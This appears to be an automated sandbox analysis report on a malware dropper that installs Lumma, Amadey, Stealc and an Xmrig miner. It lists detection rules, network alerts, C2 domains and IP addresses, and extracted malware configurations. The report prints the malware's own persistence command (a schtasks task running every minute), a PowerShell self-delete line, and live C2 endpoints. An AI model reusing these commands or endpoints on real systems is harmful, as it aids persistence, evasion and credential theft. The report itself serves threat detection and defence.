Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a98b6b83c7.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a98b6b83c7.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 4824, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 2220, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 4824, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 6180, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.262647+0100	2028371	3	Unknown Traffic	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:20.614881+0100	2028371	3	Unknown Traffic	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:24.133210+0100	2028371	3	Unknown Traffic	192.168.2.5	49866	104.121.10.34	443	TCP
2024-12-17T06:03:57.511973+0100	2028371	3	Unknown Traffic	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:03:59.464541+0100	2028371	3	Unknown Traffic	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:04:02.322645+0100	2028371	3	Unknown Traffic	192.168.2.5	49967	104.21.2.110	443	TCP
2024-12-17T06:04:05.309508+0100	2028371	3	Unknown Traffic	192.168.2.5	49975	104.21.2.110	443	TCP
2024-12-17T06:04:08.022548+0100	2028371	3	Unknown Traffic	192.168.2.5	49982	104.21.2.110	443	TCP
2024-12-17T06:04:10.193536+0100	2028371	3	Unknown Traffic	192.168.2.5	49990	104.21.2.110	443	TCP
2024-12-17T06:04:12.520678+0100	2028371	3	Unknown Traffic	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:12.568291+0100	2028371	3	Unknown Traffic	192.168.2.5	49997	104.21.2.110	443	TCP
2024-12-17T06:04:14.750910+0100	2028371	3	Unknown Traffic	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:15.939774+0100	2028371	3	Unknown Traffic	192.168.2.5	50007	104.21.2.110	443	TCP
2024-12-17T06:04:17.430840+0100	2028371	3	Unknown Traffic	192.168.2.5	50014	104.21.2.110	443	TCP
2024-12-17T06:04:19.650504+0100	2028371	3	Unknown Traffic	192.168.2.5	50035	104.21.2.110	443	TCP
2024-12-17T06:04:21.767841+0100	2028371	3	Unknown Traffic	192.168.2.5	50050	104.21.2.110	443	TCP
2024-12-17T06:04:24.342384+0100	2028371	3	Unknown Traffic	192.168.2.5	50058	104.21.2.110	443	TCP
2024-12-17T06:04:27.497100+0100	2028371	3	Unknown Traffic	192.168.2.5	50069	104.21.2.110	443	TCP
2024-12-17T06:04:29.109141+0100	2028371	3	Unknown Traffic	192.168.2.5	50073	104.21.2.110	443	TCP
2024-12-17T06:04:29.561614+0100	2028371	3	Unknown Traffic	192.168.2.5	50074	104.21.2.110	443	TCP
2024-12-17T06:04:31.076588+0100	2028371	3	Unknown Traffic	192.168.2.5	50075	104.21.2.110	443	TCP
2024-12-17T06:04:34.003186+0100	2028371	3	Unknown Traffic	192.168.2.5	50077	104.21.2.110	443	TCP
2024-12-17T06:04:36.333182+0100	2028371	3	Unknown Traffic	192.168.2.5	50079	104.21.2.110	443	TCP
2024-12-17T06:04:38.430322+0100	2028371	3	Unknown Traffic	192.168.2.5	50084	104.21.2.110	443	TCP
2024-12-17T06:04:40.607830+0100	2028371	3	Unknown Traffic	192.168.2.5	50088	104.21.2.110	443	TCP
2024-12-17T06:04:43.537379+0100	2028371	3	Unknown Traffic	192.168.2.5	50089	104.21.2.110	443	TCP
2024-12-17T06:04:46.565132+0100	2028371	3	Unknown Traffic	192.168.2.5	50090	104.21.2.110	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.687386+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:21.193694+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:58.228416+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:04:00.206136+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:04:13.522333+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:15.484868+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:29.830402+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50073	104.21.2.110	443	TCP
2024-12-17T06:04:30.300962+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50074	104.21.2.110	443	TCP
2024-12-17T06:04:31.786746+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50075	104.21.2.110	443	TCP
2024-12-17T06:04:47.556627+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50090	104.21.2.110	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.687386+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49849	104.131.68.180	443	TCP
2024-12-17T06:03:21.193694+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49856	178.62.201.34	443	TCP
2024-12-17T06:03:58.228416+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49951	104.21.2.110	443	TCP
2024-12-17T06:04:13.522333+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49996	104.21.2.110	443	TCP
2024-12-17T06:04:29.830402+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50073	104.21.2.110	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:00.206136+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49959	104.21.2.110	443	TCP
2024-12-17T06:04:15.484868+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50004	104.21.2.110	443	TCP
2024-12-17T06:04:31.786746+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50075	104.21.2.110	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:20.614881+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.5	49856	178.62.201.34	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.262647+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.5	49849	104.131.68.180	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:01:58.824490+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50096	185.215.113.16	80	TCP
2024-12-17T06:04:31.810847+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50076	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:16.607530+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49846	185.215.113.43	80	TCP
2024-12-17T06:03:28.924474+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49877	185.215.113.43	80	TCP
2024-12-17T06:03:37.199585+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49899	185.215.113.43	80	TCP
2024-12-17T06:03:49.506293+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49928	185.215.113.43	80	TCP
2024-12-17T06:03:57.938016+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49953	185.215.113.43	80	TCP
2024-12-17T06:04:08.466074+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49983	185.215.113.43	80	TCP
2024-12-17T06:04:14.310510+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50006	185.215.113.43	80	TCP

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:21.025514+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50046	104.154.220.71	80	TCP
2024-12-17T06:04:22.797197+0100	2054350	1	A Network Trojan was detected	192.168.2.5	50055	104.154.220.71	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:22.051545+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.5	58086	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.700628+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.5	59783	1.1.1.1	53	UDP
2024-12-17T06:03:18.715600+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.5	59783	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:21.595703+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.5	56126	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:14.327568+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.5	57659	1.1.1.1	53	UDP
2024-12-17T06:03:21.453049+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.5	63632	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:21.227020+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.5	53801	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:14.561874+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.5	64803	1.1.1.1	53	UDP
2024-12-17T06:03:15.561978+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.5	64803	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:22.277076+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.5	50642	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:21.821500+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.5	57611	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:13.355153+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49995	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:13.233768+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49995	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:13.682585+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49995	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:15.302791+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49995	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:14.001891+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49995	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:06.125830+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49975	104.21.2.110	443	TCP
2024-12-17T06:04:41.332192+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50088	104.21.2.110	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:12.784714+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49995	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:05.331223+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49817	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:15.273742+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49827	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:09.775893+0100	2803305	3	Unknown Traffic	192.168.2.5	49830	31.41.244.11	80	TCP
2024-12-17T06:03:18.160270+0100	2803305	3	Unknown Traffic	192.168.2.5	49850	31.41.244.11	80	TCP
2024-12-17T06:03:30.374864+0100	2803305	3	Unknown Traffic	192.168.2.5	49882	31.41.244.11	80	TCP
2024-12-17T06:03:38.648148+0100	2803305	3	Unknown Traffic	192.168.2.5	49902	31.41.244.11	80	TCP
2024-12-17T06:03:50.974065+0100	2803305	3	Unknown Traffic	192.168.2.5	49933	185.215.113.16	80	TCP
2024-12-17T06:03:59.557505+0100	2803305	3	Unknown Traffic	192.168.2.5	49958	185.215.113.16	80	TCP
2024-12-17T06:04:09.922441+0100	2803305	3	Unknown Traffic	192.168.2.5	49988	185.215.113.16	80	TCP
2024-12-17T06:04:20.832708+0100	2803305	3	Unknown Traffic	192.168.2.5	50045	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:15.748560+0100	2803304	3	Unknown Traffic	192.168.2.5	49995	185.215.113.206	80	TCP
2024-12-17T06:04:41.827114+0100	2803304	3	Unknown Traffic	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:43.673057+0100	2803304	3	Unknown Traffic	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:44.942614+0100	2803304	3	Unknown Traffic	192.168.2.5	50087	185.215.113.206	80	TCP
2024-12-17T06:04:45.969987+0100	2803304	3	Unknown Traffic	192.168.2.5	50087	185.215.113.206	80	TCP

ETPRO MALWARE LiteHTTP Bot CnC Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:37.985621+0100	2829909	1	Malware Command and Control Activity Detected	192.168.2.5	50082	185.208.159.109	80	TCP

ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:37.985621+0100	2819705	1	Malware Command and Control Activity Detected	192.168.2.5	50082	185.208.159.109	80	TCP

ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:17.264956+0100	2822521	1	Domain Observed Used for C2 Detected	104.131.68.180	443	192.168.2.5	49849	TCP
2024-12-17T06:03:20.616729+0100	2822521	1	Domain Observed Used for C2 Detected	178.62.201.34	443	192.168.2.5	49856	TCP

ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:37.019026+0100	2830238	1	A Network Trojan was detected	192.168.2.5	50082	185.208.159.109	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:04:28.291635+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50069	104.21.2.110	443	TCP
2024-12-17T06:04:45.317105+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50089	104.21.2.110	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T06:03:24.942735+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49866	104.121.10.34	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://sordid-snaked.cyou/apiQ	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/X	Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/apiU	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/apik	Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apii	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php0j	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/B	Avira URL Cloud: Label: malware
Source: https://diffuculttan.xyz/apiG	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Avira: detection malicious, Label: HEUR/AGEN.1352802
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000000.00000003.2092252463.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a98b6b83c7.exe.6528.37.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "discokeyus.lat", "necklacebudi.lat", "aspecteirs.lat", "sweepyribs.lat", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}

Multi AV Scanner detection for domain / URL

Source: https://sordid-snaked.cyou/apiQ

Virustotal: Detection: 18%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 56%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016496001\318ea9f50d.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_a700d0cf-6

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 39.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.Intel_PTT_EK_Recertification.exe.1d1f82e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.Intel_PTT_EK_Recertification.exe.19a9eae0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2990751286.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3341620499.0000000001375000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3341620499.000000000135B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2991389570.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3341620499.0000000001337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2990751286.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2991295379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3343064138.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3342923144.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.3285632813.0000019A9EAE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 4740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1244, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: Intel_PTT_EK_Recertification.exe, 0000001D.00000003.2985127530.000001D1F82E0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
